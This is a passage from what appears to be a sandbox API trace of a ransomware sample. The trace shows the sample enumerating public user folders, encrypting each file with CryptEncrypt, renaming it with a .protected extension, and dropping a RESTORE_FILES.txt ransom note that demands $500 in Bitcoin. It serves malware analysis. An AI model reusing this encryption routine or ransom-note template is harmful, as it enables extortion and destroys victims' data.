lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.977] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.977] CloseHandle (hObject=0xd4) returned 1 [0095.978] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.protected") returned 67 [0095.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.protected" 
(normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.protected")) returned 1 [0095.979] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="Windows") returned -1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="Program Files") returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="Program Files (x86)") returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="$Recycle.bin") returned 1 [0095.979] lstrcmpiW (lpString1="Tulips.jpg", lpString2="System Volume Information") returned 1 [0095.979] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.979] StrStrIW (lpFirst="Tulips.jpg", lpSrch=".protected") returned 0x0 [0095.979] lstrcmpW (lpString1="Tulips.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0095.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.980] StrStrW (lpFirst="Tulips.jpg", lpSrch=".txt") returned 0x0 [0095.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.980] StrStrW (lpFirst="Tulips.jpg", lpSrch=".rar") returned 0x0 
[0095.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0095.980] StrStrW (lpFirst="Tulips.jpg", lpSrch=".zip") returned 0x0 [0095.980] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.999] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.999] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.000] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.000] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.019] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.019] CloseHandle (hObject=0xd4) returned 1 [0096.019] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.protected") returned 65 [0096.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample 
pictures\\tulips.jpg.protected")) returned 1 [0096.020] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0096.020] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0096.020] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES.txt") returned 62 [0096.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.021] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.021] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0096.022] lstrlenA (lpString="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") returned 684 [0096.022] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0096.022] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.022] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.022] CloseHandle (hObject=0xb4) returned 1 [0096.023] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0096.023] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0096.023] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\RESTORE_FILES.txt") returned 46 [0096.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0096.023] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.023] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0096.024] lstrlenA (lpString="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") returned 684 [0096.024] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0096.024] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.024] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.024] CloseHandle (hObject=0xa4) returned 1 [0096.024] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="Windows") returned -1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="Program Files") returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="Program Files (x86)") returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="$Recycle.bin") returned 1 [0096.024] lstrcmpiW (lpString1="Recorded TV", lpString2="System Volume Information") returned -1 [0096.024] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV") returned 31 [0096.024] lstrcmpW (lpString1="Recorded TV", lpString2=".") returned 1 [0096.024] lstrcmpW (lpString1="Recorded TV", lpString2="..") returned 1 [0096.024] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\*") returned 33 [0096.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0096.025] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.025] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.025] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.025] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.025] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.025] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\.") returned 33 [0096.025] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.025] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.025] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.025] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\." (normalized: "c:\\users\\public\\recorded tv\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.025] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.025] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.025] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.025] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.025] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.025] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.025] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\..") returned 34 [0096.025] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.025] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.025] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.025] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.025] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.025] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.025] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.026] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.026] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.027] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.027] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.027] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.027] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.027] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0096.027] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.027] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x50, lpOverlapped=0x0) returned 1 [0096.027] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.027] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x50, lpOverlapped=0x0) returned 1 [0096.028] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.028] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0096.028] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0096.028] CloseHandle (hObject=0xb4) returned 1 [0096.028] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.protected") returned 53 [0096.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.protected" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.protected")) returned 1 [0096.029] 
FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="Windows") returned -1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="Program Files") returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="Program Files (x86)") returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="$Recycle.bin") returned 1 [0096.029] lstrcmpiW (lpString1="Sample Media", lpString2="System Volume Information") returned -1 [0096.029] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned 44 [0096.029] lstrcmpW (lpString1="Sample Media", lpString2=".") returned 1 [0096.029] lstrcmpW (lpString1="Sample Media", lpString2="..") returned 1 [0096.029] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned 46 [0096.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0096.029] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.029] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.029] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.029] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.029] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.029] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\.") returned 46 [0096.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.029] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.029] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.029] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.029] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\." (normalized: "c:\\users\\public\\recorded tv\\sample media\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.030] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.030] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.030] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.030] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.030] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.030] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.030] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\..") returned 47 [0096.030] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.030] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.030] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.030] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\.." 
(normalized: "c:\\users\\public\\recorded tv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.030] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.030] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.030] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.030] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.030] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.031] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.031] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.031] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.031] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.031] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0096.031] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.031] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xab, lpOverlapped=0x0) returned 1 [0096.032] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.032] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xab, lpOverlapped=0x0) returned 1 [0096.032] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.032] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.032] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.032] CloseHandle (hObject=0xd4) returned 1 [0096.032] 